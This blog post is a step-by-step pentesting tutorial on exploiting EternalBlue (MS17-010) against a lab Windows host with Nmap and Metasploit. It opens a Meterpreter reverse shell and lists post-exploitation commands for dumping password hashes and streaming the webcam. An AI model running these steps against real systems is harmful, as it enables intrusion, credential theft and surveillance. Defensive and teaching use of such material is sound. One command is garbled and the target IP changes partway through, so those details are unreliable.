• Stealth Security
  • Posts
  • How to Exploit the EternalBlue Vulnerability on Windows- A Step-by-Step Guide

How to Exploit the EternalBlue Vulnerability on Windows- A Step-by-Step Guide

Let’s learn how to look for the famous Eternal Blue vulnerability on Windows and how to exploit it.

March 23, 2025

If you’ve followed cybersecurity news over the past few years, you’ve likely come across EternalBlue.

This critical Windows exploit played a critical role in the widespread WannaCry ransomware attack that affected systems in over 150 countries.

In this post, we’ll walk through how EternalBlue works, how to scan for it, and how to exploit it using Metasploit.

Note: This is strictly for ethical hacking and penetration testing purposes on systems you own or have explicit permission to test. Do not use these tools on machines you dont have permission.

What Is EternalBlue?

EternalBlue (tracked as MS17–010) is a vulnerability in Microsoft’s Server Message Block (SMB) protocol, specifically on port 445. SMB helps devices on a network (like printers and file servers) communicate with each other.

The National Security Agency (NSA) originally discovered this vulnerability and created an exploit for it. Eventually, it was leaked and adapted by hackers into the WannaCry ransomware, causing global havoc.

Prerequisites

  1. A target Windows system vulnerable to EternalBlue (e.g., an unpatched Windows 7 system).

  2. An attacking system (often Kali Linux) with Metasploit installed.

  3. Familiarity with basic pentesting commands (Nmap, Metasploit, etc.).

Identify the Target and Check for Open Ports

First, gather the IP address of your target machine. In our example, the IP is 10.10.232.162. You’ll want to confirm that SMB (port 445) is open because EternalBlue attacks the SMB service. 

nmap -p 445 10.10.232.162

If the port is open, Nmap will report that port 445 is open. That’s your first green light.

Nmap response

Start Metasploit

Open up your terminal and start the Metasploit Framework: 

msfconsole

Metasploit will load, displaying the number of exploits, auxiliary modules, and payloads available.

Msfconsole

Scan for EternalBlue (MS17–010) Vulnerability

Next, use Metasploit’s built-in scanner for EternalBlue: 

search scan


er eternalblue

Scanner search results

Use the smb_ms17_010 scanner to check for the eternal blue vulnerability. 

use auxiliary/scanner/smb/smb_ms17_010
show options

Set the target’s IP address (RHOSTS) to your Windows machine: 

set RHOSTS 10.10.217.189

Then, run the scanner: 

run

If the scanner reports that the host is “likely vulnerable” and shows details such as Windows 7 Professional, you’ve confirmed the EternalBlue vulnerability.

ms17_010 scan results

Exploit the Vulnerability

Once you know the target is vulnerable, search for the actual EternalBlue exploit module: 

search exploit eternalblue

Exploit search results

You should see a list of possible exploits. The one we’re interested in is typically labelled something like: 

exploit/windows/smb/ms17_010_eternalblue

Use that exploit: 

use exploit/windows/smb/ms17_010_eternalblue
show options

Set the target’s IP address again: 

set RHOSTS 10.10.217.189

Check payload settings: Metasploit often defaults to a Meterpreter payload (e.g., windows/x64/meterpreter/reverse_tcp), which is ideal. Confirm your local IP (LHOST) is correct, so the connection can come back to your machine.

Options for exploit

Finally, run the exploit: 

run

Meterpreter Shell and Post-Exploitation

If successful, you will land in a Meterpreter shell. Meterpreter is a powerful payload that allows you to:

  • Dump password hashes from the Security Account Manager (SAM).

  • Elevate privileges to gain SYSTEM-level access.

  • Capture webcam streams, record microphones, and more (for demonstration and testing under ethical guidelines).

Successful meterpreter shell

Here’s a quick look at some Meterpreter commands: 

sysinfo         # Displays the target system information
getuid          # Shows the user context you’re running under
hashdump        # Dumps SAM password hashes (requires privilege escalation)
webcam_stream   # Streams from the target’s webcam if available

The EternalBlue exploit is a prime example of how a single unpatched vulnerability can expose a system for takeover.

Understanding its mechanics helps defensive teams patch systems, monitor network traffic for suspicious SMB communications, and create robust response strategies.

Conclusion

EternalBlue remains one of the most notable Windows vulnerabilities, illustrating the importance of patching and cybersecurity hygiene. From scanning with Nmap to exploiting with Metasploit, the process follows a typical penetration testing workflow: scan for holes, identify vulnerabilities, exploit, and escalate.

If this post helped you understand the inner workings of EternalBlue, feel free to share it and explore more ethical hacking resources.

For video tutorials on Cybersecurity, check out our YouTube channel. If you want to try exploiting eternal blue using a hands-on lab, check out the Security Starter course.

Happy hacking — and stay safe!

Reply

or to participate.